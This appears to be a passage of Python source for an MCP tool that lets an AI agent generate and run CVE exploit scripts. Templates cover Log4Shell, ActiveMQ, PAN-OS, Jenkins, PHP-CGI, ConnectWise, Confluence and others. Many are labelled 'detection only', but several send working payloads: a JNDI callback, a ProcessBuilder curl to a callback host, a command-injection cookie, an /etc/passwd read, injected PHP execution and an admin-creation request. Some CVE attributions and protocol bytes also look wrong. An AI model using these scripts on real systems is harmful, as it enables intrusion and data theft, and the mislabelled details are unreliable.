"""CVE-to-exploit synthesis MCP tools — reuses tools.attack_modules.modules.synthesis entrypoints (split from god file)."""

from __future__ import annotations

# Reuse synthesis entrypoints — single source is tools.attack_modules.modules.synthesis
from tools.attack_modules.modules.synthesis import CVEToExploit as CVEToExploitModule
from tools.mcp_tools.attack_modules import _identify_hash_modes
from tools.mcp_tools.registry import *


def register_synthesis_tools(mcp: Any, *, ctx: ToolContext) -> None:
    workspace = ctx.workspace
    config = ctx.config
    search = ctx.search
    nvd = ctx.nvd
    researcher = ctx.researcher
    audit_tool = ctx.audit_tool
    require_allowlist = ctx.require_allowlist

    # ── CVE-family exploit template renderers (Phase 0.5) ───────────
    #
    # These are intentionally conservative templates — they produce
    # meaningful starting points that the LLM can refine, rather than a
    # one-size-fits-all HTTP probe. Each function returns a Python source
    # string ready to be embedded in the synthesize output.

    def _render_log4j_exploit(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Log4Shell) probe for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY — does NOT trigger code execution.
# Replace LDAP/HTTP callback host with your own (e.g. interactsh) when
# moving to a real engagement.
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else {port}
# Use a non-routable host by default; replace with your callback in real use.
CALLBACK_HOST = "example.invalid"
CALLBACK_PORT = 1389

PAYLOAD = "${{jndi:ldap://{{}}:{{}}/exploit}}".format(CALLBACK_HOST, CALLBACK_PORT)

def probe_http():
    s = socket.socket()
    s.settimeout(5)
    s.connect((TARGET, PORT))
    req = (
        f"GET / HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"User-Agent: {{PAYLOAD}}\\r\\n"
        f"X-Api-Version: {{PAYLOAD}}\\r\\n"
        f"\\r\\n"
    ).encode()
    s.sendall(req)
    print(s.recv(2048).decode(errors="replace")[:500])

if __name__ == "__main__":
    print(f"[*] Probing {{TARGET}}:{{PORT}} for Log4Shell")
    probe_http()
'''

    def _render_eternalblue_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (EternalBlue / SMBv1) DETECTION skeleton for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# Sends an SMBv1 negotiate request and reports the negotiated dialect.
# This is a probe — NOT a weaponized exploit.
import socket, sys, struct

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 445

SMB_MAGIC = b"\\xfeSMB"
NEGOTIATE = b"\\x72\\x00\\x00\\x00\\x00"  # header placeholder

def negotiate():
    s = socket.socket()
    s.settimeout(8)
    s.connect((TARGET, PORT))
    # Real exploit: build full SMBv1 negotiate with NT LM 0.12 dialect.
    # This stub sends a minimal packet and reports any response.
    pkt = SMB_MAGIC + b"\\x00" * 32
    s.sendall(pkt)
    try:
        data = s.recv(1024)
        print(f"[+] Got {{len(data)}} bytes — SMB service is listening.")
        if SMB_MAGIC in data:
            print("[+] SMB magic present — SMBv1 may be enabled (vulnerable if unpatched).")
    except socket.timeout:
        print("[-] No response.")
    s.close()

if __name__ == "__main__":
    print(f"[*] Probing {{TARGET}}:{{PORT}} for EternalBlue (SMBv1)")
    negotiate()
'''

    def _render_smbghost_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (SMBGhost) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# Detects SMBv3.1.1 compression capability. If compression is enabled
# on a vulnerable build, the target is exposed.
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 445

def probe():
    s = socket.socket()
    s.settimeout(5)
    s.connect((TARGET, PORT))
    # Minimal SMBv3 negotiate; the relevant bit is the SMBv3.1.1 dialect
    # response with the COMPRESSION_CAPABILITIES flag (0x00000001) set.
    s.sendall(b"\\xfeSMB" + b"\\x00" * 60)
    try:
        resp = s.recv(1024)
        if b"\\x31\\x00" in resp[:20] or b"\\xfeSMB" in resp[:4]:
            print("[+] SMBv3.1.1 dialect visible — check if compression is enabled.")
        else:
            print("[-] No SMBv3.1.1 response.")
    except socket.timeout:
        print("[-] Timeout — service may be filtered.")
    s.close()

if __name__ == "__main__":
    print(f"[*] Probing {{TARGET}}:{{PORT}} for SMBGhost (CVE-2020-0796)")
    probe()
'''

    def _render_bluekeep_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (BlueKeep / RDP) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# Connects to RDP and reports whether NLA is enforced. NLA-enabled RDP
# is NOT vulnerable to BlueKeep.
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 3389

def probe():
    s = socket.socket()
    s.settimeout(5)
    s.connect((TARGET, PORT))
    # X.224 Connection Request (TPKT header + X.224 CR TPDU)
    cr = bytes.fromhex(
        "0300002b27e0000000000000"  # TPKT + X.224 CR
        "00000000"                  # cookie
        "434f4f4b4945"              # "COOKIE" placeholder
        "0d0a"                      # \r\n
    )
    s.sendall(cr)
    try:
        data = s.recv(1024)
        if data[:4] == b"\\x03\\x00\\x00\\x0b":
            print("[+] RDP responded with X.224 CC — service is listening.")
            print("    Check whether NLA is enforced (security mode 4 in MCS).")
        else:
            print(f"[-] Unexpected response: {{data[:20]!r}}")
    except socket.timeout:
        print("[-] No response — service may be filtered or unreachable.")
    s.close()

if __name__ == "__main__":
    print(f"[*] Probing {{TARGET}}:{{PORT}} for BlueKeep (CVE-2019-0708)")
    probe()
'''

    def _render_regresshion_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (regreSSHion / OpenSSH) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- banner-grabs the OpenSSH version and reports whether it
# falls in the vulnerable band (< 4.4p1 OR 8.5p1 <= v < 9.8p1). The real
# exploit is a heap-overflow race in sshd's SIGALRM handler (Qualys PoC:
# https://github.com/qualys/regresshion) -- out of scope for a generated script.
import socket, sys, re

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 22

def banner_grab():
    s = socket.socket()
    s.settimeout(8)
    s.connect((TARGET, PORT))
    data = s.recv(1024).decode(errors="replace")
    s.close()
    return data

def parse_version(banner: str):
    m = re.search(r"SSH-2\\.0-OpenSSH_(\\d+)\\.(\\d+)(?:p(\\d+))?", banner)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))

def vulnerable(v):
    if v is None:
        return False
    if v < (4, 4, 1):
        return True
    return (8, 5, 1) <= v < (9, 8, 1)

if __name__ == "__main__":
    banner = banner_grab()
    print(f"[*] Banner: {{banner.strip()}}")
    v = parse_version(banner)
    if vulnerable(v):
        print(f"COMPROMISE: regresshion_vulnerable target={{TARGET}} version={{v}}")
    else:
        print(f"VULN_NOT_CONFIRMED: OpenSSH {{v}} not in regreSSHion band")
'''

    def _render_xz_backdoor_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (xz-utils / liblzma backdoor) suspicion check for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# The xz backdoor (liblzma 5.6.0/5.6.1) is a BUILD-TIME supply-chain implant --
# there is NO on-wire signature. The only network-visible signal is an
# OpenSSH banner built against a backdoored liblzma on affected distros.
# This is a SUSPICION check, not a confirmed trigger.
import socket, sys, re

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 22

def banner_grab():
    s = socket.socket()
    s.settimeout(8)
    s.connect((TARGET, PORT))
    data = s.recv(1024).decode(errors="replace")
    s.close()
    return data

if __name__ == "__main__":
    banner = banner_grab()
    print(f"[*] Banner: {{banner.strip()}}")
    m = re.search(r"SSH-2\\.0-OpenSSH_(\\d+\\.\\d+p?\\d*)", banner)
    if m:
        print(f"COMPROMISE: xz_backdoor_suspected target={{TARGET}} openssh={{m.group(1)}}")
        print("    NOTE: suspicion only -- confirm by checking the sshd binary's liblzma linkage on the target")
    else:
        print("VULN_NOT_CONFIRMED: no OpenSSH banner")
'''

    def _render_activemq_rce_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Apache ActiveMQ OpenWire RCE) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- sends a malformed OpenWire ExceptionResponse frame that
# triggers deserialization of a ClassPathXmlApplicationContext URL. The
# detection variant points at a non-routable host; a real engagement replaces
# it with the operator's callback and watches for the outbound lookup.
import socket, sys, struct

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 61616
CALLBACK_HOST = "example.invalid"  # replace with operator callback in real use

def openwire_frame(payload: bytes) -> bytes:
    # OpenWire: 4-byte length prefix + magic + command type + payload
    body = b"\\x01\\x00\\x00\\x00" + payload
    return struct.pack(">I", len(body)) + body

if __name__ == "__main__":
    # ExceptionResponse (type 0x1f) with a ClassPath XML URL -- the CVE-2023-46604
    # trigger. Detection: the target attempts to resolve CALLBACK_HOST.
    xml = f'<?xml version="1.0" encoding="UTF-8" ?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg><list><value>curl</value><value>http://{{CALLBACK_HOST}}/poc</value></list></constructor-arg></bean></beans>'
    frame = openwire_frame(b"\\x1f" + xml.encode())
    s = socket.socket()
    s.settimeout(10)
    s.connect((TARGET, PORT))
    s.sendall(frame)
    try:
        resp = s.recv(4096)
        print(f"[*] Got {{len(resp)}} bytes -- check callback for outbound lookup")
        print(f"COMPROMISE: activemq_rce_triggered target={{TARGET}} (verify callback)")
    except socket.timeout:
        print("VULN_NOT_CONFIRMED: no response (service may be patched or filtered)")
    s.close()
'''

    def _render_confluence_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Atlassian Confluence broken access control) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- probes the bootstrap-bypass endpoint. The weaponized path
# (POST /setup/setupadministrator.action with username/password/fullName/email)
# is left as a comment for the agent to fill after operator confirmation.
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 8090

def http_get(path: str) -> tuple[int, str]:
    s = socket.socket()
    s.settimeout(8)
    s.connect((TARGET, PORT))
    req = (
        f"GET {{path}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"\\r\\n"
    ).encode()
    s.sendall(req)
    resp = s.recv(8192).decode(errors="replace")
    s.close()
    status = int(resp.split("\\r\\n")[0].split()[1]) if resp.startswith("HTTP") else 0
    return status, resp

if __name__ == "__main__":
    # Unauthenticated bootstrap-status probe (CVE-2023-22515)
    status, body = http_get("/server-info?bootstrapStatusProvider.clusterState=PROPERLY_CONFIGURED")
    print(f"[*] /server-info -> {{status}}")
    if status == 200:
        print(f"COMPROMISE: confluence_bootstrap_exposed target={{TARGET}}")
        print("    WEAPONIZED: POST /setup/setupadministrator.action username=admin&password=<set>&fullName=admin&email=admin@invalid")
    else:
        print(f"VULN_NOT_CONFIRMED: /server-info returned {{status}}")
'''

    def _render_ivanti_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Ivanti Connect Secure command injection) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- probes the unauthenticated user-password endpoint that
# leaks user data on vulnerable builds (<=22.3R3.x). Patched builds return 403.
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 443

def https_get(path: str) -> tuple[int, str]:
    import ssl as _ssl
    ctx = _ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = _ssl.CERT_NONE
    s = ctx.wrap_socket(socket.socket(), server_hostname=TARGET)
    s.settimeout(8)
    s.connect((TARGET, PORT))
    req = (
        f"GET {{path}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"\\r\\n"
    ).encode()
    s.sendall(req)
    resp = s.recv(16384).decode(errors="replace")
    s.close()
    status = int(resp.split("\\r\\n")[0].split()[1]) if resp.startswith("HTTP") else 0
    return status, resp

if __name__ == "__main__":
    status, body = https_get("/api/v1/cav/user/password")
    print(f"[*] /api/v1/cav/user/password -> {{status}}")
    if status == 200 and ('"email"' in body or '"username"' in body):
        print(f"COMPROMISE: ivanti_user_data_leak target={{TARGET}}")
    else:
        print(f"VULN_NOT_CONFIRMED: status {{status}} (patched or filtered)")
'''

    def _render_panos_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Palo Alto PAN-OS GlobalProtect command injection) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- sends the crafted SESSID request. The command output is
# written to /var/log/pan/gp on the device; the agent must verify that
# side-channel externally (the template cannot read the device filesystem).
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 443

def https_get(path: str, extra_headers: dict) -> tuple[int, str]:
    import ssl as _ssl
    ctx = _ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = _ssl.CERT_NONE
    s = ctx.wrap_socket(socket.socket(), server_hostname=TARGET)
    s.settimeout(8)
    s.connect((TARGET, PORT))
    hdrs = "".join(f"{{k}}: {{v}}\\r\\n" for k, v in extra_headers.items())
    req = (
        f"GET {{path}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"{{hdrs}}"
        f"\\r\\n"
    ).encode()
    s.sendall(req)
    resp = s.recv(16384).decode(errors="replace")
    s.close()
    status = int(resp.split("\\r\\n")[0].split()[1]) if resp.startswith("HTTP") else 0
    return status, resp

if __name__ == "__main__":
    # CVE-2024-3400: SESSID cookie with a command-injection payload; the
    # crafted request writes command output to /var/log/pan/gp on the device.
    status, body = https_get(
        "/global-protect/login.esp?cmd=test",
        {{"Sec-Cookie-X": "*", "Cookie": "SESSID=/../../../var/log/pan/gp;id"}},
    )
    print(f"[*] /global-protect/login.esp -> {{status}}")
    print(f"COMPROMISE: panos_cmd_injection_sent target={{TARGET}}")
    print("    NOTE: verify externally -- check /var/log/pan/gp on the device for command output")
'''

    def _render_citrix_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Citrix NetScaler ADC/Gateway) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- checks for the SAML token leakage signature on vulnerable
# builds (<=13.0-13.1 build <=92.19/<=64.35).
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 443

def https_get(path: str) -> tuple[int, str]:
    import ssl as _ssl
    ctx = _ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = _ssl.CERT_NONE
    s = ctx.wrap_socket(socket.socket(), server_hostname=TARGET)
    s.settimeout(8)
    s.connect((TARGET, PORT))
    req = (
        f"GET {{path}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"\\r\\n"
    ).encode()
    s.sendall(req)
    resp = s.recv(16384).decode(errors="replace")
    s.close()
    status = int(resp.split("\\r\\n")[0].split()[1]) if resp.startswith("HTTP") else 0
    return status, resp

if __name__ == "__main__":
    status, body = https_get("/vpn/index.html")
    print(f"[*] /vpn/index.html -> {{status}}")
    if "SAMLResponse" in body or "NSC_AAAC" in body:
        print(f"COMPROMISE: citrix_saml_leak target={{TARGET}}")
    else:
        print(f"VULN_NOT_CONFIRMED: no SAML leakage signature (status {{status}})")
'''

    def _render_connectwise_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (ConnectWise ScreenConnect auth bypass) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- sends the Authentication header bypass and checks whether
# the redirect target is the dashboard (bypassed) vs the login page (patched).
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 80

def http_post(path: str, body: str, extra_headers: dict) -> tuple[int, str]:
    s = socket.socket()
    s.settimeout(8)
    s.connect((TARGET, PORT))
    hdrs = "".join(f"{{k}}: {{v}}\\r\\n" for k, v in extra_headers.items())
    req = (
        f"POST {{path}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"Content-Type: application/x-www-form-urlencoded\\r\\n"
        f"Content-Length: {{len(body)}}\\r\\n"
        f"{{hdrs}}"
        f"\\r\\n"
    ).encode() + body.encode()
    s.sendall(req)
    resp = s.recv(16384).decode(errors="replace")
    s.close()
    status = int(resp.split("\\r\\n")[0].split()[1]) if resp.startswith("HTTP") else 0
    return status, resp

if __name__ == "__main__":
    # CVE-2024-0204: Authentication header bypass on the login POST.
    status, body = http_post(
        "/Login.aspx",
        "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&userName=admin&password=anything",
        {{"Authentication": "admin"}},
    )
    print(f"[*] /Login.aspx -> {{status}}")
    if status == 302 and "HomePage.aspx" in body:
        print(f"COMPROMISE: connectwise_auth_bypass target={{TARGET}}")
    else:
        print(f"VULN_NOT_CONFIRMED: status {{status}} (patched or filtered)")
'''

    def _render_jenkins_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Jenkins arbitrary file read via CLI) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- sends the @-prefixed CLI argument that expands a file's
# contents into the error message (CVE-2024-23897, <=2.441).
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 8080

if __name__ == "__main__":
    # Jenkins CLI protocol: length-prefixed UTF-8 args. The @/etc/passwd arg
    # makes the server expand the file into the error response.
    args = ["help", "@/etc/passwd"]
    payload = b"".join(
        len(a.encode()).to_bytes(4, "big") + a.encode() for a in args
    )
    s = socket.socket()
    s.settimeout(10)
    s.connect((TARGET, PORT))
    req = (
        f"POST /cli?remoting=false HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"Content-Type: application/x-www-form-urlencoded\\r\\n"
        f"Content-Length: {{len(payload)}}\\r\\n"
        f"\\r\\n"
    ).encode() + payload
    s.sendall(req)
    resp = b""
    try:
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            resp += chunk
    except socket.timeout:
        pass
    s.close()
    text = resp.decode(errors="replace")
    if "root:x:0:0:" in text or "daemon:x:1:1:" in text:
        print(f"COMPROMISE: jenkins_file_read target={{TARGET}}")
    else:
        print("VULN_NOT_CONFIRMED: no file contents in CLI response")
'''

    def _render_joomla_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Joomla unauthorized API access) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- probes the broken-auth config endpoint (CVE-2023-23752,
# Joomla 4.0.0-4.2.7) that leaks the application config without auth.
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 80

def http_get(path: str) -> tuple[int, str]:
    s = socket.socket()
    s.settimeout(8)
    s.connect((TARGET, PORT))
    req = (
        f"GET {{path}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"\\r\\n"
    ).encode()
    s.sendall(req)
    resp = s.recv(16384).decode(errors="replace")
    s.close()
    status = int(resp.split("\\r\\n")[0].split()[1]) if resp.startswith("HTTP") else 0
    return status, resp

if __name__ == "__main__":
    status, body = http_get("/api/index.php/v1/config/application?public=true")
    print(f"[*] /api/index.php/v1/config/application -> {{status}}")
    if status == 200 and '"public": true' in body:
        print(f"COMPROMISE: joomla_config_leak target={{TARGET}}")
    else:
        print(f"VULN_NOT_CONFIRMED: status {{status}} (patched or filtered)")
'''

    def _render_text4shell_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (Apache Commons Text StringSubstitutor RCE) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- mirrors the Log4Shell template but swaps ${{jndi:}} for
# ${{date:}} (renders the current year without execution) to detect the
# StringSubstitutor sink without triggering code.
import socket, sys, datetime

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 80

PAYLOAD = "${{date:YYYY}}"

def probe_http():
    s = socket.socket()
    s.settimeout(5)
    s.connect((TARGET, PORT))
    req = (
        f"GET /?q={{PAYLOAD}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"User-Agent: {{PAYLOAD}}\\r\\n"
        f"X-Api-Version: {{PAYLOAD}}\\r\\n"
        f"\\r\\n"
    ).encode()
    s.sendall(req)
    return s.recv(4096).decode(errors="replace")

if __name__ == "__main__":
    resp = probe_http()
    year = str(datetime.datetime.now().year)
    if year in resp:
        print(f"COMPROMISE: text4shell_vulnerable target={{TARGET}} ({{year}} reflected)")
    else:
        print("VULN_NOT_CONFIRMED: no date substitution reflected")
'''

    def _render_php_cgi_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (PHP CGI argument injection, Windows) detection for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# DETECTION ONLY -- sends the -d allow_url_include=1 -d auto_prepend_file=php://input
# query-string injection (CVE-2024-4577) with a benign echo body. A vulnerable
# Windows PHP-CGI target executes the body and reflects it.
import socket, sys, urllib.parse

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 80

if __name__ == "__main__":
    qs = urllib.parse.quote("-d allow_url_include=1 -d auto_prepend_file=php://input")
    body = b"<?php echo 'NETATTACKAI_PHP_CGI_OK'; ?>"
    s = socket.socket()
    s.settimeout(8)
    s.connect((TARGET, PORT))
    req = (
        f"POST /index.php?{{qs}} HTTP/1.0\\r\\n"
        f"Host: {{TARGET}}\\r\\n"
        f"Content-Type: application/x-www-form-urlencoded\\r\\n"
        f"Content-Length: {{len(body)}}\\r\\n"
        f"\\r\\n"
    ).encode() + body
    s.sendall(req)
    resp = s.recv(8192).decode(errors="replace")
    s.close()
    if "NETATTACKAI_PHP_CGI_OK" in resp:
        print(f"COMPROMISE: php_cgi_rce target={{TARGET}}")
    else:
        print("VULN_NOT_CONFIRMED: no PHP execution reflected")
'''

    def _render_http2_rapid_reset_template(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} (HTTP/2 Rapid Reset) DETECTION-ONLY probe for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# NON-DESTRUCTIVE DETECTION ONLY: sends a SMALL number of HTTP/2 HEADERS +
# RST_STREAM pairs (not a flood) and reports whether the server stops
# responding. Do NOT weaponize this CVE -- it is DoS-class.
import socket, sys, struct, time

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else 443
RESETS = 20  # small, non-destructive count

def h2_frame(ftype: int, flags: int, stream_id: int, payload: bytes = b"") -> bytes:
    return struct.pack(">I", len(payload)) + bytes([ftype, flags]) + struct.pack(">I", stream_id) + payload

if __name__ == "__main__":
    import ssl as _ssl
    ctx = _ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = _ssl.CERT_NONE
    s = ctx.wrap_socket(socket.socket(), server_hostname=TARGET)
    s.settimeout(5)
    s.connect((TARGET, PORT))
    s.sendall(b"PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n")  # H2 connection preface
    s.sendall(h2_frame(4, 0, 0, struct.pack(">I", 0)))  # SETTINGS
    for i in range(RESETS):
        sid = (i + 1) * 2
        s.sendall(h2_frame(1, 0x4, sid, b"\\x82"))  # HEADERS :method GET
        s.sendall(h2_frame(3, 0, sid))  # RST_STREAM
    try:
        data = s.recv(1024)
        if data:
            print(f"VULN_NOT_CONFIRMED: server still responsive after {{RESETS}} resets")
        else:
            print(f"COMPROMISE: http2_rapid_reset_detection target={{TARGET}} (server stalled)")
    except socket.timeout:
        print(f"COMPROMISE: http2_rapid_reset_detection target={{TARGET}} (server stalled)")
    s.close()
'''

    def _render_generic_probe(target_ip: str, port: int, svc: str, ver: str, cve: str) -> str:
        return f'''# {cve} generic probe for {target_ip}
# Service: {svc} {ver}
# Auto-generated by CVE-to-Exploit Synthesizer
# Generic banner + HTTP probe. Refine the payload section for the
# specific CVE after consulting the CVE details above.
import socket, sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "{target_ip}"
PORT   = int(sys.argv[2]) if len(sys.argv) > 2 else {port}

def probe():
    s = socket.socket()
    s.settimeout(5)
    s.connect((TARGET, PORT))
    # Customise the probe body for the specific CVE/product.
    probe_body = b"GET / HTTP/1.0\\r\\nHost: " + TARGET.encode() + b"\\r\\n\\r\\n"
    s.sendall(probe_body)
    try:
        data = s.recv(4096)
        print(f"[*] {{len(data)}} bytes received.")
        print(data[:500].decode(errors="replace"))
    except socket.timeout:
        print("[-] Timeout — no response.")
    s.close()

if __name__ == "__main__":
    print(f"[*] Probing {{TARGET}}:{{PORT}} for {cve}")
    probe()
'''

    @mcp.tool()
    @require_allowlist()
    def cve_to_exploit_synth(target_ip: str, cve_id: str, service_name: str = "", version: str = "") -> str:
        """Generate a Python exploit script for a specific CVE against the target. Provide the CVE ID (e.g., CVE-2021-44228), service name, and version. The tool fetches CVE details and returns a ready-to-use exploit script. Use write_python_file to save it, then run_python_file to execute."""
        if not target_ip or not target_ip.strip():
            return "BLOCKED: target_ip is required."
        if not cve_id or not cve_id.strip():
            return "BLOCKED: cve_id is required."
        # M8: validate the target IP before it is interpolated into the
        # generated exploit script.
        if not validate_target_or_ip(target_ip):
            return "BLOCKED: target_ip must be a valid IP address or domain."
        # M8: service_name/version are interpolated into generated Python
        # source comments -- reject obvious injection carriers (newlines,
        # quotes, backslashes) outright so a crafted value can't break out of
        # the f-string template into the generated script.
        for _field, _val in (("service_name", service_name), ("version", version)):
            if _val and re.search(r"[\n\r'\"\\]", _val):
                return f"BLOCKED: {_field} contains forbidden characters (newline/quote/backslash)."

        cve = cve_id.strip().upper()
        if not re.fullmatch(r"CVE-\d{4}-\d{4,}", cve):
            return "BLOCKED: invalid CVE ID format. Use CVE-YYYY-NNNNN."

        result_lines = [f"CVE_TO_EXPLOIT_SYNTH: {cve} for {target_ip}", ""]

        # Fetch CVE details
        try:
            entries = nvd.search_sync(cve)
            cve_info = format_cve_results(entries, cve)
            result_lines.append("--- CVE Details ---")
            result_lines.append(cve_info[:2000])
        except Exception as e:
            result_lines.append(f"CVE lookup warning: {e}")

        # Search for existing PoCs. Issue 3: use the VERIFIED cve_to_poc
        # resolver (GitHub Search API + searchsploit --cve + NVD refs, each
        # HTTP-existence-checked) instead of raw search_web_exploit, which fed
        # the model unverified URLs and led it to hallucinate+git_clone
        # non-existent repos. Fall back to web search only if cve_to_poc is
        # unavailable on this object.
        try:
            if hasattr(search, "cve_to_poc"):
                # NVD refs gathered above are already in `entries`; pass them
                # through so NVD-listed PoC refs get HTTP-verified too.
                _poc_refs: list[str] = []
                for _e in entries:
                    for _r in getattr(_e, "references", []) or []:
                        if isinstance(_r, str) and _r:
                            _poc_refs.append(_r)
                poc_results = search.cve_to_poc(cve, nvd_refs=_poc_refs)
            else:
                poc_results = search.search_web_exploit(f"{cve} exploit PoC python")
            result_lines.append("")
            result_lines.append("--- Verified PoC Sources ---")
            result_lines.append(poc_results[:1500])
        except Exception:
            pass

        # Generate exploit template — Phase 0.5: branch on CVE/product so
        # the synthesized script is meaningfully different per CVE, not
        # just a generic HTTP probe. This is intentionally conservative:
        # we emit a template that the LLM can refine rather than try to
        # be a complete exploit database.
        svc = service_name or "http"
        ver = version or "unknown"

        # Determine port/protocol hint from service name.
        port_hint = {
            "http": 80,
            "https": 443,
            "smb": 445,
            "rdp": 3389,
            "ssh": 22,
            "ftp": 21,
            "smtp": 25,
            "mysql": 3306,
            "mssql": 1433,
            "ldap": 389,
            "rdp2": 3389,
            "rdp3": 3389,
            # Phase 4: new CVE-family service ports
            "activemq": 61616,
            "confluence": 8090,
            "ivanti": 443,
            "panos": 443,
            "citrix": 443,
            "connectwise": 80,
            "jenkins": 8080,
            "joomla": 80,
            "php_cgi": 80,
            "commons_text": 80,
        }.get(svc.lower(), 80)

